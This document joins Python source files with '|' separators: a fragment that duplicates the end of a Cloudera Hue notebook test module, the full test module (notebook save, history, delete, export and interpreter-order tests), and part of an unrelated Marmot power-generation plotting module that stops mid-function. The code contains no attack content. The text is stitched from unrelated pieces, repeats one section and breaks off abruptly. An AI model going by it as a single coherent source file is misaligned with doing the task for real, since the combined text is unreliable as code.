"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
response = self.client.post(reverse('notebook:download'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': 'csv'
})
content = "".join(response)
assert_true(len(content) > 0)
def test_get_interpreters_to_show():
default_interpreters = OrderedDict((
('hive', {
'name': 'Hive', 'interface': 'hiveserver2', 'type': 'hive', 'is_sql': True, 'options': {}, 'is_catalog': False,
}),
('spark', {
'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
}),
('pig', {
'name': 'Pig', 'interface': 'pig', 'type': 'pig', 'is_sql': False, 'options': {}, 'is_catalog': False,
}),
('java', {
'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
})
))
expected_interpreters = OrderedDict((
('java', {
'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
}),
('pig', {
'name': 'Pig', 'interface': 'pig', 'is_sql': False, 'type': 'pig', 'options': {}, 'is_catalog': False,
}),
('hive', {
'name': 'Hive', 'interface': 'hiveserver2', 'is_sql': True, 'type': 'hive', 'options': {}, 'is_catalog': False,
}),
('spark', {
'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
})
))
try:
resets = [INTERPRETERS.set_for_testing(default_interpreters), APP_BLACKLIST.set_for_testing('')]
appmanager.DESKTOP_MODULES = []
appmanager.DESKTOP_APPS = None
appmanager.load_apps(APP_BLACKLIST.get())
interpreters_shown_on_wheel_unset = get_ordered_interpreters()
assert_equal(default_interpreters.values(), interpreters_shown_on_wheel_unset,
'get_interpreters_to_show should return the same as get_interpreters when '
'interpreters_shown_on_wheel is unset. expected: %s, actual: %s'
% (default_interpreters.values(), interpreters_shown_on_wheel_unset))
resets.append(INTERPRETERS_SHOWN_ON_WHEEL.set_for_testing('java,pig'))
assert_equal(expected_interpreters.values(), get_ordered_interpreters(),
'get_interpreters_to_show did not return interpreters in the correct order expected: %s, actual: %s'
% (expected_interpreters.values(), get_ordered_interpreters()))
finally:
for reset in resets:
reset()
appmanager.DESKTOP_MODULES = []
appmanager.DESKTOP_APPS = None
appmanager.load_apps(APP_BLACKLIST.get())
class TestAnalytics():
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
self.user = User.objects.get(username="test")
def test_basic_stats(self):
try:
doc, created = Document2.objects.get_or_create(name='test_query_stats', type='query-hive', owner=self.user, data={})
Analytics.admin_stats()
Analytics.user_stats(user=self.user)
Analytics.query_stats(query=doc)
finally:
doc.delete()
| #!/usr/bin/env python
## -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from collections import OrderedDict
from nose.tools import assert_equal, assert_true, assert_false
from django.contrib.auth.models import User
from django.urls import reverse
from azure.conf import is_adls_enabled
from desktop import appmanager
from desktop.conf import APP_BLACKLIST
from desktop.lib.django_test_util import make_logged_in_client
from desktop.lib.test_utils import grant_access, add_permission
from desktop.models import Directory, Document, Document2
from hadoop import cluster as originalCluster
import notebook.connectors.hiveserver2
from notebook.api import _historify
from notebook.connectors.base import Notebook, QueryError, Api
from notebook.decorators import api_error_handler
from notebook.conf import get_ordered_interpreters, INTERPRETERS_SHOWN_ON_WHEEL, INTERPRETERS
from notebook.models import Analytics
class TestNotebookApi(object):
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
self.user = User.objects.get(username="test")
self.user_not_me = User.objects.get(username="not_perm_user")
grant_access("test", "default", "notebook")
grant_access("not_perm_user", "default", "notebook")
self.notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": 50010,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "5982a274-de78-083c-2efc-74f53dce744c",
"isSaved": false,
"parentUuid": null
}
"""
self.notebook = json.loads(self.notebook_json)
self.doc2 = Document2.objects.create(id=50010, name=self.notebook['name'], type=self.notebook['type'], owner=self.user)
self.doc1 = Document.objects.link(self.doc2, owner=self.user, name=self.doc2.name,
description=self.doc2.description, extra=self.doc2.type)
def test_save_notebook(self):
# Test that saving a new document with a new parent will set the parent_directory
home_dir = Document2.objects.get_home_directory(self.user)
assert_equal(home_dir.uuid, self.doc2.parent_directory.uuid)
new_dir = Directory.objects.create(name='new_dir', owner=self.user, parent_directory=home_dir)
notebook_cp = self.notebook.copy()
notebook_cp.pop('id')
notebook_cp['directoryUuid'] = new_dir.uuid
notebook_json = json.dumps(notebook_cp)
response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
doc = Document2.objects.get(pk=data['id'])
assert_equal(new_dir.uuid, doc.parent_directory.uuid)
# Test that saving a new document with a no parent will map it to its home dir
notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
doc = Document2.objects.get(pk=data['id'])
assert_equal(Document2.objects.get_home_directory(self.user).uuid, doc.parent_directory.uuid)
# Test that saving a notebook will save the search field to the first statement text
assert_equal(doc.search, "select * from default.web_logs where app = 'metastore';")
def test_historify(self):
# Starts with no history
assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
assert_equal(1, Document.objects.filter(name__contains=self.notebook['name']).count())
history_doc = _historify(self.notebook, self.user)
assert_true(history_doc.id > 0)
# Test that historify creates new Doc2 and linked Doc1
assert_equal(1, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
assert_equal(2, Document.objects.filter(name__contains=self.notebook['name']).count())
# Historify again
history_doc = _historify(self.notebook, self.user)
assert_equal(2, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
assert_equal(3, Document.objects.filter(name__contains=self.notebook['name']).count())
def test_get_history(self):
assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
# History should not return history objects that don't have the given doc type
Document2.objects.create(name='Impala History', type='query-impala', data=self.notebook_json, owner=self.user, is_history=True)
# Verify that get_history API returns history objects for given type and current user
response = self.client.get(reverse('notebook:get_history'), {'doc_type': 'hive'})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal(3, len(data['history']), data)
assert_true(all(doc['type'] == 'query-hive' for doc in data['history']), data)
# TODO: test that query history for shared query only returns docs accessible by current user
def test_clear_history(self):
assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
_historify(self.notebook, self.user)
assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
# Clear history should not clear history objects that don't have the given doc type
Document2.objects.create(name='Impala History', type='query-impala', owner=self.user, is_history=True)
# clear history should retain original document but wipe history
response = self.client.post(reverse('notebook:clear_history'), {'notebook': self.notebook_json, 'doc_type': 'hive'})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_false(Document2.objects.filter(type='query-hive', is_history=True).exists())
assert_true(Document2.objects.filter(type='query-hive', is_history=False).exists())
assert_true(Document2.objects.filter(type='query-impala', is_history=True).exists())
def test_delete_notebook(self):
trash_notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id": "e069ef32-5c95-4507-b961-e79c090b5abf","type":"hive","status":"ready","database":"default","statement":"select * from web_logs","statement_raw":"select * from web_logs","variables":[],"properties":{"settings":[],"files":[],"functions":[]},"result":{}}],
"uuid": "8a20da5f-b69c-4843-b17d-dea5c74c41d1"
}
"""
# Assert that the notebook is first saved
response = self.client.post(reverse('notebook:save_notebook'), {'notebook': trash_notebook_json})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
# Test that deleting it moves it to the user's Trash folder
notebook_doc = Document2.objects.get(id=data['id'])
trash_notebooks = [Notebook(notebook_doc).get_data()]
response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('Trashed 1 notebook(s)', data['message'], data)
response = self.client.get('/desktop/api2/doc', {'path': '/.Trash'})
data = json.loads(response.content)
trash_uuids = [doc['uuid'] for doc in data['children']]
assert_true(notebook_doc.uuid in trash_uuids, data)
# Test that any errors are reported in the response
nonexistant_doc = {
"id": 12345,
"uuid": "ea22da5f-b69c-4843-b17d-dea5c74c41d1",
"selectedSnippet": "hive",
"showHistory": False,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": None,
}
],
"type": "query-hive",
"snippets": [{
"id": "e069ef32-5c95-4507-b961-e79c090b5abf",
"type": "hive",
"status": "ready",
"database": "default",
"statement": "select * from web_logs",
"statement_raw": "select * from web_logs",
"variables": [],
"properties": {"settings": [], "files": [], "functions": []},
"result": {}
}]
}
trash_notebooks = [nonexistant_doc]
response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('Trashed 0 notebook(s) and failed to delete 1 notebook(s).', data['message'], data)
assert_equal(['ea22da5f-b69c-4843-b17d-dea5c74c41d1'], data['errors'])
def test_query_error_encoding(self):
@api_error_handler
def send_exception(message):
raise QueryError(message=message)
message = """SELECT
a.key,
a.*
FROM customers c, c.addresses a"""
response =send_exception(message)
data = json.loads(response.content)
assert_equal(1, data['status'])
message = """SELECT
\u2002\u2002a.key,
\u2002\u2002a.*
FROM customers c, c.addresses a"""
response =send_exception(message)
data = json.loads(response.content)
assert_equal(1, data['status'])
message = u"""SELECT
a.key,
a.*
FROM déclenché c, c.addresses a"""
response =send_exception(message)
data = json.loads(response.content)
assert_equal(1, data['status'])
class MockedApi(Api):
def execute(self, notebook, snippet):
return {
'sync': True,
'has_result_set': True,
'result': {
'has_more': False,
'data': [['test']],
'meta': [{
'name': 'test',
'type': '',
'comment': ''
}],
'type': 'table'
}
}
def close_statement(self, notebook, snippet):
pass
def export_data_as_hdfs_file(self, snippet, target_file, overwrite):
return {'destination': target_file}
class MockFs():
def __init__(self, logical_name=None):
self.fs_defaultfs = 'hdfs://curacao:8020'
self.logical_name = logical_name if logical_name else ''
self.DEFAULT_USER = 'test'
self.user = 'test'
self._filebrowser_action = ''
def setuser(self, user):
self.user = user
@property
def user(self):
return self.user
def do_as_user(self, username, fn, *args, **kwargs):
return ''
def exists(self, path):
return True
def isdir(self, path):
return path == '/user/hue'
def filebrowser_action(self):
return self._filebrowser_action
class TestNotebookApiMocked(object):
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
self.user = User.objects.get(username="test")
self.user_not_me = User.objects.get(username="not_perm_user")
# Beware: Monkey patch HS2API Mock API
if not hasattr(notebook.connectors.hiveserver2, 'original_HS2Api'): # Could not monkey patch base.get_api
notebook.connectors.hiveserver2.original_HS2Api = notebook.connectors.hiveserver2.HS2Api
notebook.connectors.hiveserver2.HS2Api = MockedApi
originalCluster.get_hdfs()
self.original_fs = originalCluster.FS_CACHE["default"]
originalCluster.FS_CACHE["default"] = MockFs()
grant_access("test", "default", "notebook")
grant_access("test", "default", "beeswax")
grant_access("test", "default", "hive")
grant_access("not_perm_user", "default", "notebook")
grant_access("not_perm_user", "default", "beeswax")
grant_access("not_perm_user", "default", "hive")
add_permission('test', 'has_adls', permname='adls_access', appname='filebrowser')
def tearDown(self):
notebook.connectors.hiveserver2.HS2Api = notebook.connectors.hiveserver2.original_HS2Api
if originalCluster.FS_CACHE is None:
originalCluster.FS_CACHE = {}
originalCluster.FS_CACHE["default"] = self.original_fs
def test_export_result(self):
notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
response = self.client.post(reverse('notebook:export_result'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': json.dumps('hdfs-file'),
'destination': json.dumps('/user/hue'),
'overwrite': json.dumps(False)
})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('/user/hue/Test Hive Query.csv', data['watch_url']['destination'], data)
response = self.client.post(reverse('notebook:export_result'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': json.dumps('hdfs-file'),
'destination': json.dumps('/user/hue/path.csv'),
'overwrite': json.dumps(False)
})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('/user/hue/path.csv', data['watch_url']['destination'], data)
if is_adls_enabled():
response = self.client.post(reverse('notebook:export_result'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': json.dumps('hdfs-file'),
'destination': json.dumps('adl:/user/hue/path.csv'),
'overwrite': json.dumps(False)
})
data = json.loads(response.content)
assert_equal(0, data['status'], data)
assert_equal('adl:/user/hue/path.csv', data['watch_url']['destination'], data)
def test_download_result(self):
notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
response = self.client.post(reverse('notebook:download'), {
'notebook': notebook_json,
'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
'format': 'csv'
})
content = "".join(response)
assert_true(len(content) > 0)
def test_get_interpreters_to_show():
default_interpreters = OrderedDict((
('hive', {
'name': 'Hive', 'interface': 'hiveserver2', 'type': 'hive', 'is_sql': True, 'options': {}, 'is_catalog': False,
}),
('spark', {
'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
}),
('pig', {
'name': 'Pig', 'interface': 'pig', 'type': 'pig', 'is_sql': False, 'options': {}, 'is_catalog': False,
}),
('java', {
'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
})
))
expected_interpreters = OrderedDict((
('java', {
'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
}),
('pig', {
'name': 'Pig', 'interface': 'pig', 'is_sql': False, 'type': 'pig', 'options': {}, 'is_catalog': False,
}),
('hive', {
'name': 'Hive', 'interface': 'hiveserver2', 'is_sql': True, 'type': 'hive', 'options': {}, 'is_catalog': False,
}),
('spark', {
'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
})
))
try:
resets = [INTERPRETERS.set_for_testing(default_interpreters), APP_BLACKLIST.set_for_testing('')]
appmanager.DESKTOP_MODULES = []
appmanager.DESKTOP_APPS = None
appmanager.load_apps(APP_BLACKLIST.get())
interpreters_shown_on_wheel_unset = get_ordered_interpreters()
assert_equal(default_interpreters.values(), interpreters_shown_on_wheel_unset,
'get_interpreters_to_show should return the same as get_interpreters when '
'interpreters_shown_on_wheel is unset. expected: %s, actual: %s'
% (default_interpreters.values(), interpreters_shown_on_wheel_unset))
resets.append(INTERPRETERS_SHOWN_ON_WHEEL.set_for_testing('java,pig'))
assert_equal(expected_interpreters.values(), get_ordered_interpreters(),
'get_interpreters_to_show did not return interpreters in the correct order expected: %s, actual: %s'
% (expected_interpreters.values(), get_ordered_interpreters()))
finally:
for reset in resets:
reset()
appmanager.DESKTOP_MODULES = []
appmanager.DESKTOP_APPS = None
appmanager.load_apps(APP_BLACKLIST.get())
class TestAnalytics():
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
self.user = User.objects.get(username="test")
def test_basic_stats(self):
try:
doc, created = Document2.objects.get_or_create(name='test_query_stats', type='query-hive', owner=self.user, data={})
Analytics.admin_stats()
Analytics.user_stats(user=self.user)
Analytics.query_stats(query=doc)
finally:
doc.delete()
|
"""Timeseries generation line plots.
This code creates generation non-stacked line plots.
@author: Daniel Levie
"""
import logging
import pandas as pd
import datetime as dt
import matplotlib.pyplot as plt
import marmot.config.mconfig as mconfig
from marmot.plottingmodules.plotutils.plot_library import SetupSubplot
from marmot.plottingmodules.plotutils.plot_data_helper import PlotDataHelper
from marmot.plottingmodules.plotutils.plot_exceptions import (MissingInputData, MissingZoneData)
class MPlot(PlotDataHelper):
"""generation_unstack MPlot class.
All the plotting modules use this same class name.
This class contains plotting methods that are grouped based on the
current module name.
The generation_unstack.py module contains methods that are
related to the timeseries generation of generators, displayed in an unstacked line format.
MPlot inherits from the PlotDataHelper class to assist in creating figures.
"""
def __init__(self, argument_dict: dict):
"""
Args:
argument_dict (dict): Dictionary containing all
arguments passed from MarmotPlot.
"""
# iterate over items in argument_dict and set as properties of class
# see key_list in Marmot_plot_main for list of properties
for prop in argument_dict:
self.__setattr__(prop, argument_dict[prop])
# Instantiation of MPlotHelperFunctions
super().__init__(self.Marmot_Solutions_folder, self.AGG_BY, self.ordered_gen,
self.PLEXOS_color_dict, self.Scenarios, self.ylabels,
self.xlabels, self.gen_names_dict, self.TECH_SUBSET,
Region_Mapping=self.Region_Mapping)
self.logger = logging.getLogger('marmot_plot.'+__name__)
self.curtailment_prop = mconfig.parser("plot_data","curtailment_property")
def gen_unstack(self, figure_name: str = None, prop: str = None,
start: float = None, end: float= None,
timezone: str = "", start_date_range: str = None,
end_date_range: str = None, **_):
"""Creates a timeseries plot of generation by technology each plotted as a line.
If multiple scenarios are passed they will be plotted in a facet plot.
The plot can be further customized by passing specific values to the
prop argument.
Args:
figure_name (str, optional): User defined figure output name.
Defaults to None.
prop (str, optional): Special argument used to adjust specific
plot settings. Controlled through the plot_select.csv.
Opinions available are:
- Peak Demand
- Min Net Load
- Date Range
Defaults to None.
start (float, optional): Used in conjunction with the prop argument.
Will define the number of days to plot before a certain event in
a timeseries plot, e.g Peak Demand.
Defaults to None.
end (float, optional): Used in conjunction with the prop argument.
Will define the number of days to plot after a certain event in
a timeseries plot, e.g Peak Demand.
Defaults to None.
timezone (str, optional): The timezone to display on the x-axes.
Defaults to "".
start_date_range (str, optional): Defines a start date at which to represent data from.
Defaults to None.
end_date_range (str, optional): Defines a end date at which to represent data to.
Defaults to None.
Returns:
dict: dictionary containing the created plot and its data table.
"""
outputs = {}
facet=False
if 'Facet' in figure_name:
facet = True
if self.AGG_BY == 'zone':
agg = 'zone'
else:
agg = 'region'
def getdata(scenario_list):
# List of properties needed by the plot, properties are a set of tuples and contain 3 parts:
# required True/False, property name and scenarios required, scenarios must be a list.
properties = [(True,"generator_Generation",scenario_list),
(False,f"generator_{self.curtailment_prop}",scenario_list),
(False,"generator_Pump_Load",scenario_list),
(True,f"{agg}_Load",scenario_list),
(False,f"{agg}_Unserved_Energy",scenario_list)]
# Runs get_formatted_data within PlotDataHelper to populate PlotDataHelper dictionary
# with all required properties, returns a 1 if required data is missing
return self.get_formatted_data(properties)
if facet:
check_input_data = getdata(self.Scenarios)
all_scenarios = self.Scenarios
else:
check_input_data = getdata([self.Scenarios[0]])
all_scenarios = [self.Scenarios[0]]
# Checks if all data required by plot is available, if 1 in list required data is missing
if 1 in check_input_data:
outputs = MissingInputData()
return outputs
# sets up x, y dimensions of plot
ncols, nrows = self.set_facet_col_row_dimensions(multi_scenario=all_scenarios)
# If the plot is not a facet plot, grid size should be 1x1
if not facet:
ncols = 1
nrows = 1
grid_size = ncols*nrows
# Used to calculate any excess axis to delete
plot_number = len(all_scenarios)
for zone_input in self.Zones:
self.logger.info(f"Zone = {zone_input}")
excess_axs = grid_size - plot_number
mplt = SetupSubplot(nrows, ncols, sharey=True,
squeeze=False, ravel_axs=True)
fig, axs = mplt.get_figure()
plt.subplots_adjust(wspace=0.05, hspace=0.5)
# If creating a facet plot the font is scaled by 9% for each added x dimesion fact plot
if ncols > 1:
font_scaling_ratio = 1 + ((ncols-1)*0.09)
plt.rcParams['xtick.labelsize'] *= font_scaling_ratio
plt.rcParams['ytick.labelsize'] *= font_scaling_ratio
plt.rcParams['legend.fontsize'] *= font_scaling_ratio
plt.rcParams['axes.labelsize'] *= font_scaling_ratio
plt.rcParams['axes.titlesize'] *= font_scaling_ratio
data_tables = []
for i, scenario in enumerate(all_scenarios):
self.logger.info(f"Scenario = {scenario}")
try:
Stacked_Gen = self["generator_Generation"].get(scenario).copy()
if self.shift_leapday == True:
Stacked_Gen = self.adjust_for_leapday(Stacked_Gen)
Stacked_Gen = Stacked_Gen.xs(zone_input,level=self.AGG_BY)
except KeyError:
# self.logger.info('No generation in %s',zone_input)
continue
if Stacked_Gen.empty == True:
continue
Stacked_Gen = self.df_process_gen_inputs(Stacked_Gen)
# Insert Curtailment into gen stack if it exists in database
Stacked_Curt = self[f"generator_{self.curtailment_prop}"].get(scenario).copy()
if not Stacked_Curt.empty:
curtailment_name = self.gen_names_dict.get('Curtailment','Curtailment')
if self.shift_leapday == True:
Stacked_Curt = self.adjust_for_leapday(Stacked_Curt)
if zone_input in Stacked_Curt.index.get_level_values(self.AGG_BY).unique():
Stacked_Curt = Stacked_Curt.xs(zone_input,level=self.AGG_BY)
Stacked_Curt = self.df_process_gen_inputs(Stacked_Curt)
# If using Marmot's curtailment property
if self.curtailment_prop == 'Curtailment':
Stacked_Curt = self.assign_curtailment_techs(Stacked_Curt)
Stacked_Curt = Stacked_Curt.sum(axis=1)
Stacked_Curt[Stacked_Curt<0.05] = 0 #Remove values less than 0.05 MW
Stacked_Gen.insert(len(Stacked_Gen.columns),column=curtailment_name,value=Stacked_Curt) #Insert curtailment into
# Calculates Net Load by removing variable gen + curtailment
vre_gen_cat = self.vre_gen_cat + [curtailment_name]
else:
vre_gen_cat = self.vre_gen_cat
else:
vre_gen_cat = self.vre_gen_cat
# Adjust list of values to drop depending on if it exists in Stacked_Gen df
vre_gen_cat = [name for name in vre_gen_cat if name in Stacked_Gen.columns]
Net_Load = Stacked_Gen.drop(labels = vre_gen_cat, axis=1)
Net_Load = Net_Load.sum(axis=1)
Stacked_Gen = Stacked_Gen.loc[:, (Stacked_Gen != 0).any(axis=0)]
Load = self[f"{agg}_Load"].get(scenario).copy()
if self.shift_leapday == True:
Load = self.adjust_for_leapday(Load)
Load = Load.xs(zone_input,level=self.AGG_BY)
Load = Load.groupby(["timestamp"]).sum()
Load = Load.squeeze() #Convert to Series
Pump_Load = self["generator_Pump_Load"][scenario].copy()
if Pump_Load.empty:
Pump_Load = self['generator_Generation'][scenario].copy()
Pump_Load.iloc[:,0] = 0
if self.shift_leapday == True:
Pump_Load = self.adjust_for_leapday(Pump_Load)
Pump_Load = Pump_Load.xs(zone_input,level=self.AGG_BY)
Pump_Load = Pump_Load.groupby(["timestamp"]).sum()
Pump_Load = Pump_Load.squeeze() #Convert to Series
if (Pump_Load == 0).all() == False:
Pump_Load = Load - Pump_Load
else:
Pump_Load = Load
Unserved_Energy = self[f"{agg}_Unserved_Energy"][scenario].copy()
if Unserved_Energy.empty:
Unserved_Energy = self[f"{agg}_Load"][scenario].copy()
Unserved_Energy.iloc[:,0] = 0
if self.shift_leapday == True:
Unserved_Energy = self.adjust_for_leapday(Unserved_Energy)
Unserved_Energy = Unserved_Energy.xs(zone_input,level=self.AGG_BY)
Unserved_Energy = Unserved_Energy.groupby(["timestamp"]).sum()
Unserved_Energy = Unserved_Energy.squeeze() #Convert to Series
if prop == "Peak Demand":
peak_pump_load_t = Pump_Load.idxmax()
end_date = peak_pump_load_t + dt.timedelta(days=end)
start_date = peak_pump_load_t - dt.timedelta(days=start)
# Peak_Pump_Load = Pump_Load[peak_pump_load_t]
Stacked_Gen = Stacked_Gen[start_date : end_date]
Load = Load[start_date : end_date]
Unserved_Energy = Unserved_Energy[start_date : end_date]
Pump_Load = Pump_Load[start_date : end_date]
elif prop == "Min Net Load":
min_net_load_t = Net_Load.idxmin()
end_date = min_net_load_t + dt.timedelta(days=end)
start_date = min_net_load_t - dt.timedelta(days=start)
# Min_Net_Load = Net_Load[min_net_load_t]
Stacked_Gen = Stacked_Gen[start_date : end_date]
Load = Load[start_date : end_date]
Unserved_Energy = Unserved_Energy[start_date : end_date]
Pump_Load = Pump_Load[start_date : end_date]
elif pd.notna(start_date_range):
self.logger.info(f"Plotting specific date range: \
{str(start_date_range)} to {str(end_date_range)}")
Stacked_Gen = Stacked_Gen[start_date_range : end_date_range]
Load = Load[start_date_range : end_date_range]
Unserved_Energy = Unserved_Energy[start_date_range : end_date_range]
else:
self.logger.info("Plotting graph for entire timeperiod")
# unitconversion based off peak generation hour, only checked once
if i == 0:
unitconversion = self.capacity_energy_unitconversion(Stacked_Gen)
Stacked_Gen = Stacked_Gen/unitconversion['divisor']
